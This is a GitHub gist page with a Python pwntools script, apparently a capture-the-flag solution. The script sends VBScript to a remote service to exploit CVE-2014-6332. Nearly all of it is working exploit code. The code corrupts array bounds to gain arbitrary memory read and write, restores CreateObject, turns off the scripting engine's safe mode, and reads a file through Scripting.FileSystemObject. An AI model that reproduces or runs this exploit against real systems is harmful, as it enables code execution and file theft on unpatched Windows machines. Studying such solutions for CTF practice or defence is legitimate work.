-
-
Save seanwupi/286c823afe64617c652d to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| from pwn import * # pip install pwntools | |
| # Ref: https://swehack.org/viewtopic.php?f=18&t=216 | |
| # CVE-2014-6332 | |
| # | |
| # 1. Follow the steps above | |
| # 2. Get CreateObject() by corrupt the symbol string | |
| # 3. Turn off safemode | |
| # 4. Create Scripting.FileSystemObject and read C:\flag.txt | |
| r = remote('202.112.26.109', 12345) | |
| def g(x): | |
| y = [] | |
| for i in x.split('\n'): | |
| if i.strip(): | |
| y.append(i.strip()) | |
| x = ':'.join(y) | |
| r.recvuntil('>>>') | |
| print x | |
| r.send(x+'\n') | |
| g(''' | |
| dim aa() | |
| dim ab() | |
| dim a0 | |
| dim a1 | |
| dim a2 | |
| dim a3 | |
| dim win9x | |
| dim intVersion | |
| dim rnda | |
| dim funclass | |
| dim myarray | |
| Randomize() | |
| redim aa(5) | |
| redim ab(5) | |
| a0=13+17*rnd(6) | |
| a3=7+3*rnd(5) | |
| ''') | |
| g(''' | |
| function Over() | |
| On Error Resume Next | |
| dim type1,type2,type3 | |
| Over=False | |
| a0=a0+a3 | |
| a1=a0+2 | |
| a2=a0+&h8000000 | |
| redim Preserve aa(a0) | |
| redim ab(a0) | |
| redim Preserve aa(a2) | |
| type1=1 | |
| ab(0)=1.123456789012345678901234567890 | |
| aa(a0)=10 | |
| If(IsObject(aa(a1-1)) = False) Then | |
| if(vartype(aa(a1-1))<>0) Then | |
| If(IsObject(aa(a1)) = False ) Then | |
| type1=VarType(aa(a1)) | |
| end if | |
| end if | |
| end if | |
| If(type1=&h2f66) Then | |
| Over=True | |
| End If | |
| redim Preserve aa(a0) | |
| end function | |
| ''') | |
| g(''' | |
| For i = 0 To 400 | |
| If Over()=True Then | |
| Exit For | |
| End If | |
| Next | |
| ''') | |
| g(''' | |
| myarray=chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00) | |
| myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0) | |
| ''') | |
| g(''' | |
| sub testaa() | |
| end sub | |
| ''') | |
| g(''' | |
| function mydata() | |
| On Error Resume Next | |
| i=testaa | |
| i=null | |
| redim Preserve aa(a2) | |
| ab(0)=0 | |
| aa(a1)=i | |
| ab(0)=6.36598737437801E-314 | |
| aa(a1+2)=myarray | |
| ab(2)=1.74088534731324E-310 | |
| mydata=aa(a1) | |
| redim Preserve aa(a0) | |
| end function | |
| ''') | |
| g(''' | |
| function rm(add) | |
| On Error Resume Next | |
| redim Preserve aa(a2) | |
| ab(0)=0 | |
| aa(a1)=add+4 | |
| ab(0)=1.69759663316747E-313 | |
| rm=lenb(aa(a1)) | |
| ab(0)=0 | |
| redim Preserve aa(a0) | |
| end function | |
| ''') | |
| g('Print mydata()') | |
| addr = int(r.recvuntil('\r\n')) | |
| print 'addr =', hex(addr) | |
| g(''' | |
| function wm(addx) | |
| On Error Resume Next | |
| redim Preserve aa(a2) | |
| aa(a1+2)(addx)=ab(4) | |
| redim Preserve aa(a0) | |
| end function | |
| ''') | |
| # Get default CreateObject() back by destroy the symbol string | |
| # addr-1167*4: C.r.e.a.t.e.O.b.j.e.c.t | |
| g('wm(%d)' % (addr - 1167*4 - 4)) | |
| # Turn off the safemode | |
| # int __thiscall COleScript::InSafeMode(COleScript *__hidden this) | |
| # test byte ptr [ecx+174h], 0Bh | |
| # push 0 | |
| # pop eax | |
| # setnz al | |
| # retn | |
| g('wm(rm(rm(%d)+16)+&h174)' % (addr+8)) | |
| # Read flag | |
| g('Set fso = CreateObject("Scripting.FileSystemObject")') | |
| g('Set f = fso.OpenTextFile("C:\\flag.txt")') | |
| g('Print f.ReadLine') | |
| print r.recvuntil('}') | |
| r.close() | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment